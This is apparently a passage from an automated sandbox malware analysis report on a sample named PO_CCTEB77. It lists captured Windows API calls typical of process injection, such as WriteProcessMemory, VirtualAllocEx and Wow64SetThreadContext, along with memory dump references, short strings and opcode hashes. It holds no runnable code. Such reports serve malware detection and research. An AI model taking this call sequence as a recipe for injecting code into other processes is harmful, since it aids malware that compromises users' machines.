                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0797B1B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0797B290
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315D666,?,?,?,?,?), ref: 0315D727
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315D666,?,?,?,?,?), ref: 0315D727
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0797B006
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0797B290
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0797B006
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315B4C1,00000800,00000000,00000000), ref: 0315B6B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0797B0CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797C9B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315B4C1,00000800,00000000,00000000), ref: 0315B6B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0797D2D9,?,?), ref: 0797D480
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0797B0CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (aq
                                                                            • API String ID: 0-600464949
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0797D2D9,?,?), ref: 0797D480
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0315B446
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797C9B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Haq
                                                                            • API String ID: 0-725504367
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l
                                                                            • API String ID: 0-1554365358
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: B
                                                                            • API String ID: 0-1255198513
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: B
                                                                            • API String ID: 0-1255198513
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: m6
                                                                            • API String ID: 0-2040306782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: m6
                                                                            • API String ID: 0-2040306782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~552
                                                                            • API String ID: 0-3806510334
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4j
                                                                            • API String ID: 0-3078020137
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4j
                                                                            • API String ID: 0-3078020137
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3836374a4941feb3e1cf2c42bb6aa987bb1978a8629916625e5cec9495621731
                                                                            • Instruction ID: fd948569a3e1534ff6b3c727fef55824b79f11ff1fba2ee630ff29c4238655af
                                                                            • Opcode Fuzzy Hash: 3836374a4941feb3e1cf2c42bb6aa987bb1978a8629916625e5cec9495621731
                                                                            • Instruction Fuzzy Hash: 5A517135910B09DFCB11EFB9C44499DBBB1FF89300F218A6EE4556B221EB70A985CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aed4978a1ef001399f69ae06ee01a945447d91b79293fbd188dbd490e897998f
                                                                            • Instruction ID: fa28c41722eeca365f4301a614d8c02e7e18a007afb21d599590a00890d6c780
                                                                            • Opcode Fuzzy Hash: aed4978a1ef001399f69ae06ee01a945447d91b79293fbd188dbd490e897998f
                                                                            • Instruction Fuzzy Hash: 5941BE74701240DFCB15DF69C980B9ABBFAEF89205F10506DE4099B7A1DB79E846CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 891b4e84657610783be5980b01cf8314f3f9775227cb81bba5184b1a96e08f68
                                                                            • Instruction ID: 330fefbb39f92b9c5795792c690abdc785b8b6f9eb79ff60bb9e61b8cf3c2eb5
                                                                            • Opcode Fuzzy Hash: 891b4e84657610783be5980b01cf8314f3f9775227cb81bba5184b1a96e08f68
                                                                            • Instruction Fuzzy Hash: 48515031900B09DFCB11EFB9C54499DB7B1FF89300F21866DE5556B222EB70AA85CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e0f3e13c461acf4d824253b7a7a5751902eebe48afc319fe262c45c11cbdc163
                                                                            • Instruction ID: b1f4fa7111e93d823562313d3d4eeeb9d9a903d547abe6c6175e878bbc730ff8
                                                                            • Opcode Fuzzy Hash: e0f3e13c461acf4d824253b7a7a5751902eebe48afc319fe262c45c11cbdc163
                                                                            • Instruction Fuzzy Hash: 4751A038611608EFCB14DF69D894D9EBBB5FF89721B1140A9F901AB361DB71EC82CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2044736979.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_14bd000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b1ec7c7aea54c10991469cb518e68cb86629bcd10b9a0a7d8640f9633930169
                                                                            • Instruction ID: fbd330861dd9aa9c2b2de784f571f4635767c734834178c00f5654c6f8ac6f06
                                                                            • Opcode Fuzzy Hash: 2b1ec7c7aea54c10991469cb518e68cb86629bcd10b9a0a7d8640f9633930169
                                                                            • Instruction Fuzzy Hash: C921F171900244DFDB05DF98D9C0B66BF65FB98318F2085AAE90D0A266C33AD416CAB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cce693761bb51f5bd978f62ec88b229873333d75b82defac5e3ef92210b67b6e
                                                                            • Instruction ID: ac493550e9cf11c1d317f040a7b6afb8a1d313db8f94218cfd70e90f98a6adad
                                                                            • Opcode Fuzzy Hash: cce693761bb51f5bd978f62ec88b229873333d75b82defac5e3ef92210b67b6e
                                                                            • Instruction Fuzzy Hash: 6831FC74E052099FCB04CFA9D580AAEFFF5BB89300F14D5AAC414A7315D734AA45CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ded7bd37e01efd981923a78cff316029af98e42e8cb2403b9f5fafeac6f4f4a
                                                                            • Instruction ID: 0ec083e21fa9b87963e770dc429cfdb8e2baec04ac3d308c76df8131d2e5c227
                                                                            • Opcode Fuzzy Hash: 0ded7bd37e01efd981923a78cff316029af98e42e8cb2403b9f5fafeac6f4f4a
                                                                            • Instruction Fuzzy Hash: 6C215B35700610DFCB24DE19D580A6BB3EAEFC8622B40546EFA0697764DB71FC42CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2044822733.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_14dd000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 91a7dcb0cb37026e97d086818b3860d8861cb204876132bad2a76d2b9d9b0a3e
                                                                            • Instruction ID: 992b37007c2c5b0bb68b482f9cd32cb1ddf30d3708365f7f88ee0a5991437ae1
                                                                            • Opcode Fuzzy Hash: 91a7dcb0cb37026e97d086818b3860d8861cb204876132bad2a76d2b9d9b0a3e
                                                                            • Instruction Fuzzy Hash: 4A21D071A44204DFDF05CFA8D9D4B26BBA5FB88314F20C57AD9094A3A6C73AE406CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2044822733.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_14dd000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 91b3ac62b7b51a7956535748d03e6ff58c765e06a4200dbfdc4e4f837d004c36
                                                                            • Instruction ID: 9470c125efbd4a13197b4f921a232a6f03acb7ce4487efc9ff43b29653cbe2dc
                                                                            • Opcode Fuzzy Hash: 91b3ac62b7b51a7956535748d03e6ff58c765e06a4200dbfdc4e4f837d004c36
                                                                            • Instruction Fuzzy Hash: 8521F271A043049FDF05DFA8C9D0F26BB65FB84324F20C56EE9494B3A6C33AD446CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1d37c5d6ba2f6f8e7da1ba822fc690f48ceab819fbf6013b59c2aa963b972e5
                                                                            • Instruction ID: 3118dfa5bb8c4b23c3f03069255d2d8a64ec9379e33d3f5f8b2e4d41d3acab1d
                                                                            • Opcode Fuzzy Hash: d1d37c5d6ba2f6f8e7da1ba822fc690f48ceab819fbf6013b59c2aa963b972e5
                                                                            • Instruction Fuzzy Hash: 162139B0E15249DFCB44CFA9D9805AEFFF5AF89311F14D5AAC009A7224E3349B41DB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 98adbcee73ddaef6716b2dabbedfaa6a31807e01ad2b8ca24ebb708468a365d9
                                                                            • Instruction ID: 2f9c82246f2eff2a7693b4530679e32962b3b2cae1e403f7da70d51adfcb209f
                                                                            • Opcode Fuzzy Hash: 98adbcee73ddaef6716b2dabbedfaa6a31807e01ad2b8ca24ebb708468a365d9
                                                                            • Instruction Fuzzy Hash: B3214AB0E05209DFCB48CFA9C4806AEBBF2FF89301F1485AAD815E7355D735AA55CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 02d0cc8ca3dd4db071bd13e589e8550bb704dc550159fcc25de673107f596e04
                                                                            • Instruction ID: 1c4a2c4b38bb0840c9f52fc806b0add7e78c1eb3655a9694bf46c38fbcc9e38d
                                                                            • Opcode Fuzzy Hash: 02d0cc8ca3dd4db071bd13e589e8550bb704dc550159fcc25de673107f596e04
                                                                            • Instruction Fuzzy Hash: 9C218875600600AFCB20CE25C480E6777FAEFC9621B4050AEF94A8B725DB71FC428B60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cfd911913ae7a1eab1e5fe36188dcdbbcc10928c43beb7c61b5717bb1c3f787b
                                                                            • Instruction ID: bdf2f8e49c9982351922f16223435a1d197705e9e1b90a9112b482e749f37cca
                                                                            • Opcode Fuzzy Hash: cfd911913ae7a1eab1e5fe36188dcdbbcc10928c43beb7c61b5717bb1c3f787b
                                                                            • Instruction Fuzzy Hash: FB21FE74E04209DFCB44CF9AC5806AEFBF6BB88300F54D5AAC418A7315D734AA418F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a109bd3f97fd41f66025dd4ea7c5390892734c555871d2b03ef7aa076533d79
                                                                            • Instruction ID: b68631a86a843dea4a1a3585108baf47b62d44b586420e107496479df896e89e
                                                                            • Opcode Fuzzy Hash: 9a109bd3f97fd41f66025dd4ea7c5390892734c555871d2b03ef7aa076533d79
                                                                            • Instruction Fuzzy Hash: 5A2108B0E05209DFCB44CFAAD9405AEFBF5AF88315F10D5AAC409A7214E3749B51CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582d9c303c37ed2e472ca5167600ef7a74ef930e23ea7395e6494b3803edb284
                                                                            • Instruction ID: 078bc520738e863677dd0943daa676b8c2d2124ec792cca816314728d2e5cf83
                                                                            • Opcode Fuzzy Hash: 582d9c303c37ed2e472ca5167600ef7a74ef930e23ea7395e6494b3803edb284
                                                                            • Instruction Fuzzy Hash: E1112C392063956FCB125A659C01ABB3FEDAFC2215F04846BF519CB192C67AC986C3A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8011ac7c3db093bc2cf0f398903065781f27d1a29f3ae78aa864de087b52bb20
                                                                            • Instruction ID: 3c70f365fc1d65c41b08cc153ab49dd03d62244206524c354c2cd69e8fa1c344
                                                                            • Opcode Fuzzy Hash: 8011ac7c3db093bc2cf0f398903065781f27d1a29f3ae78aa864de087b52bb20
                                                                            • Instruction Fuzzy Hash: 082128B0E05209DFCB48CFA9C5806AEBBF6FB88301F108569C819A7354D735AA52CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6af75f2fa8d8449186d86e46b0d7cef973d6edf25986540a19fe931190dda04
